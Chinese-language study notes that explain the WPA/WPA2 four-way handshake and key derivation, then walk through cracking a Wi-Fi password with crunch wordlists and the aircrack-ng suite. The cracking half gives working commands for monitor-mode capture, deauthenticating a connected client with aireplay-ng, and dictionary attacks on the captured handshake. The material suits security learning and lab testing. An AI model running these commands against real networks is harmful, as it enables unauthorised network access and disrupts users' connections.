WPA 全名 WI-FI Protected Access, 有WPA 和WPA2两个标准,是一种保护无线网络的安全协议。
WPA实现了IEEE802.11i标准的大部分,是在802.11i完备之前替代WEP的过度方案,后被WPA2取代。
由于WPA和WPA2都是基于802.11i,因此在技术层面几乎是相同的。主要区别在于WPA2要求支持更安全的CCMP。
WPA和WPA2均使用802.11i中定义的四次握手,客户端(station)和接入点(AP)通过四次握手相互验证和协商名为成对临时密钥(Pairwise Transient Key, PTK)的会话密钥。PTK通过成对主密钥(Pairwise Master key, PMK)、AP随机数ANonce、STA随机数SNonce和双方MAC地址等计算生成。其中PMK由登陆密码等双方均已知的信息计算生成,而后续正常数据加密所使用的临时密钥(Temporal KEY, TK)即派生自PTK,各密钥、参数的关系如下:
四次握手的过程可概括如下:
(1)AP发送自己的随机数ANonce给STA
(2)STA生成随机数SNonce,计算出PTK,并将SNonce和信息完整性校验码MIC发送给AP
(3)AP收到SNonce,计算出PTK(此时双方都有PTK),将组密钥GTK加密后连同MIC发给STA
(4)STA收到GTK,安装PTK和GTK,发送ACK确认。AP收到确认后安装PTK。
http://192.168.1.1/ //路由器地址
crunch 8 8 -t %%%%%,,, > pwd.txt
8:最小长度
8:最大长度
-t:定义输出格式
,:代表大写字母
%:代表数字
^:代表符号
14GB大字典
查看字典
tail pwd.txt
vi passwd.txt12456
sadasdas
SXiooo1
16330XSX
12345678
ip a
airmon-ng start wlan0
airodump-ng wlan0mon
airodump-ng wlan0mon -c 1 --bssid 10:BD:18:08:43:31 -w wpa-1
-c:指定信道
--bssid:AP的MAC地址
-w:保存抓包结果
将设备踢下线,当用户重连的时候,就会抓到握手包
aireplay-ng -0 5 -a 10:BD:18:08:43:31 -c 68:54:5A:85:CB:40 wlan0mon
-0:冲突攻击模式,后面跟发送次数(设置为 0,则为循环攻击,不停的断开连接,客户端无法正常上网)
-a:设置 ap 的 mac
-c:设置已连接的合法客户端的 mac
aircrack-ng -w passwd.txt wpa-1-01.cap
aircrack-ng -w pwd.txt wpa-1-01.cap
crunch 8 8 -t %%%%%,,, | aircrack-ng wpa-1-01.cap -e cisco-432F -w -
推荐用这种随时生成密码随时破解,不会像生成密码那样占用大量的磁盘空间